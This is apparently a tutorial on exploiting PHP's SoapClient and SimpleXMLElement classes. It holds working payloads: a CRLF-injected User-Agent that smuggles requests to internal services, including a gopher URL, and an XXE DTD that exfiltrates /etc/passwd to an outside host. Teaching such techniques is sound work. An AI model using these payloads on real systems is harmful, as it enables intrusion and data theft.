Exploiting PHP built-in classes: a summary

Do not fear the future, do not dwell on the past. Thus, all is well!

Feng Zikai (丰子恺)

Mainly useful for SSRF.

0X1 SoapClient

<?php
// Non-WSDL mode: 'location' is the endpoint the HTTP POST is sent to,
// 'uri' is the SOAP service namespace.
$a = new SoapClient(null, array('location' => "http://127.0.0.1:9999/path1", 'uri' => 'http://127.0.0.1:9999/path'));

// Any undefined method goes through SoapClient::__call and triggers the request.
$a->something(array("a" => 6));

location is the address the request is actually sent to; uri is the service namespace, which ends up in the SOAPAction header and in the ns1 namespace of the envelope. For SSRF the one that matters is location. Catching the request with nc shows the following:

root@maple:~# nc -l -p 9999
POST /path1 HTTP/1.1
Host: 127.0.0.1:9999
Connection: Keep-Alive
User-Agent: PHP-SOAP/7.3.0-2
Content-Type: text/xml; charset=utf-8
SOAPAction: "http://127.0.0.1:9999/path#something"
Content-Length: 625

<?xml version="1.0" encoding="UTF-8"?>
<SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" xmlns:ns1="http://127.0.0.1:9999/path" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:ns2="http://xml.apache.org/xml-soap" xmlns:SOAP-ENC="http://schemas.xmlsoap.org/soap/encoding/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><SOAP-ENV:Body><ns1:something><param0 xsi:type="ns2:Map"><item><key xsi:type="xsd:string">a</key><value xsi:type="xsd:int">6</value></item></param0></ns1:something></SOAP-ENV:Body></SOAP-ENV:Envelope>


The exploitation point is that the User-Agent can be set freely and is not filtered for CRLF (\r\n), so a header injection turns into a full request injection:

$a->_user_agent = "AAAAAHaha\r\n\r\nGET /miniProxy.php?gopher:///db:1433/A"." HTTP/1.1\r\nHost: localhost\r\n\r\n";

Both nginx and Apache accept several requests back to back on one connection (HTTP/1.1 pipelining), so everything after the injected blank line is parsed as a second, independent request:

POST /path1 HTTP/1.1
Host: 127.0.0.1:9999
Connection: Keep-Alive
User-Agent: AAAAAHaha

GET /miniProxy.php?gopher:///db:1433/A HTTP/1.1
Host: localhost


Content-Type: text/xml; charset=utf-8
SOAPAction: "http://127.0.0.1:9999/path#something"
Content-Length: 625

<?xml version="1.0" encoding="UTF-8"?>
<SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" xmlns:ns1="http://127.0.0.1:9999/path" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:ns2="http://xml.apache.org/xml-soap" xmlns:SOAP-ENC="http://schemas.xmlsoap.org/soap/encoding/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><SOAP-ENV:Body><ns1:something><param0 xsi:type="ns2:Map"><item><key xsi:type="xsd:string">a</key><value xsi:type="xsd:int">6</value></item></param0></ns1:something></SOAP-ENV:Body></SOAP-ENV:Envelope>

The smuggled request can be either GET or POST (SoapClient itself only ever sends POST), with headers and body fully under our control, which can be used to get around some restrictions.
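As an added example (not code from the original post), the following builds the User-Agent payload programmatically so that the smuggled request can be a POST with its own headers and body, and fires it through SoapClient::__call. The listener is the same 127.0.0.1:9999 nc from above; the internal path /internal/admin and its form body are assumptions made for illustration.

```php
<?php
// Added example, not from the original post. Builds a SoapClient whose
// User-Agent smuggles a complete second request. Everything targets
// 127.0.0.1:9999, the nc listener used in the post (run `nc -l -p 9999`).
// The internal target /internal/admin and its form body are assumed.

function smuggledUserAgent(string $method, string $path, string $host, array $headers = [], string $body = ''): string
{
    // Close the outer POST's header block early. It carries no
    // Content-Length yet, so the server treats its body as empty.
    $ua = "SmugglingUA\r\n\r\n";
    $ua .= "$method $path HTTP/1.1\r\n";
    $ua .= "Host: $host\r\n";
    foreach ($headers as $name => $value) {
        $ua .= "$name: $value\r\n";
    }
    // Content-Length must match the smuggled body exactly. The SOAP headers
    // and envelope that SoapClient appends afterwards then become a third,
    // malformed request that the server rejects; by then the smuggled one
    // has already been processed.
    $ua .= 'Content-Length: ' . strlen($body) . "\r\n";
    $ua .= "\r\n" . $body;
    return $ua;
}

// Assumed form body for the hypothetical internal endpoint.
$body = http_build_query(['action' => 'flush', 'confirm' => '1']);

$client = new SoapClient(null, [
    'location'   => 'http://127.0.0.1:9999/path1',
    'uri'        => 'http://127.0.0.1:9999/path',
    // Same effect as assigning $client->_user_agent after construction.
    'user_agent' => smuggledUserAgent(
        'POST', '/internal/admin', 'localhost',
        ['Content-Type' => 'application/x-www-form-urlencoded'],
        $body
    ),
]);

// Any undefined method name goes through SoapClient::__call and sends the request.
try {
    $client->something(['a' => 6]);
} catch (SoapFault $e) {
    // nc is not a SOAP server, so a fault is expected; the raw request has
    // already been written to the socket by the time it is raised.
    echo "request sent; SoapFault: ", $e->getMessage(), "\n";
}
```

Start `nc -l -p 9999` first and look at the captured stream: it contains the empty-bodied outer POST, the smuggled POST with its form body, and then the leftover Content-Type/SOAPAction/Content-Length lines and envelope as a third fragment. This relies on the User-Agent not being sanitised, which is what the post observed on PHP 7.3; check the behaviour on the target's PHP build before relying on it.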

It is worth looking at how Go handles this.


0x2 SimpleXMLElement


final public SimpleXMLElement::__construct ( string $data [, int $options = 0 [, bool $data_is_url = FALSE [, string $ns = "" [, bool $is_prefix = FALSE ]]]] )


Note that entities are not expanded by default; pass $options = LIBXML_NOENT to have them substituted. Since $data is usually an external reference (a file path or URL rather than an XML string), $data_is_url also needs to be true.


xxe.xml

<?xml version="1.0" ?>
<!DOCTYPE r [
<!ELEMENT r ANY >
<!ENTITY % sp SYSTEM "http://1.3.3.7:8000/xxe.dtd">
%sp;
%param1;
]>
<r>&exfil;</r>


xxe.dtd

<!ENTITY % data SYSTEM "php://filter/convert.base64-encode/resource=/etc/passwd">
<!ENTITY % param1 "<!ENTITY exfil SYSTEM 'http://1.3.3.7:8000/?%data;'>">
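As an added example that is not part of the original post, the following runs the SimpleXMLElement constructor from the signature above three times against a file the script creates itself, so the effect of LIBXML_NOENT and $data_is_url can be observed offline without the out-of-band DTD. The temporary paths are generated by the script and are the only assumptions.

```php
<?php
// Added example, not from the original post: the same SimpleXMLElement call
// with and without LIBXML_NOENT, against a locally created secret file so
// that it runs offline. All paths are temporary files created here.

$secretPath = tempnam(sys_get_temp_dir(), 'xxe');
file_put_contents($secretPath, "s3cr3t-token\n");

// Inline XXE payload (constructed): a general entity pointing at the file.
$xml = <<<XML
<?xml version="1.0"?>
<!DOCTYPE r [
  <!ENTITY leak SYSTEM "file://{$secretPath}">
]>
<r>&leak;</r>
XML;

// Also written to disk so the $data_is_url = true form can be shown.
$xmlPath = tempnam(sys_get_temp_dir(), 'doc');
file_put_contents($xmlPath, $xml);

function parseWith(string $data, int $options, bool $isUrl): string
{
    // Collect libxml errors instead of emitting warnings to keep output clean.
    libxml_use_internal_errors(true);
    try {
        $el = new SimpleXMLElement($data, $options, $isUrl);
        return (string) $el;          // text content of <r>
    } catch (Exception $e) {
        return 'error: ' . $e->getMessage();
    } finally {
        libxml_clear_errors();
    }
}

// 1. Default options: the entity reference is left unexpanded, nothing is read.
var_dump(parseWith($xml, 0, false));

// 2. LIBXML_NOENT: the external entity is substituted and the file is read.
var_dump(parseWith($xml, LIBXML_NOENT, false));

// 3. Same, but $data is a path that the parser itself loads ($data_is_url = true).
var_dump(parseWith($xmlPath, LIBXML_NOENT, true));

unlink($secretPath);
unlink($xmlPath);
```

On a current libxml2 the first call should give an empty string while the second and third return the secret file's content; that difference is the whole point of the LIBXML_NOENT remark above. The hardening follows directly: never pass LIBXML_NOENT (or LIBXML_DTDLOAD) when the document comes from a user, and treat $data_is_url = true with user-controlled $data as an additional file-read and SSRF primitive, since the path may be any stream wrapper including php://filter as used in xxe.dtd.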

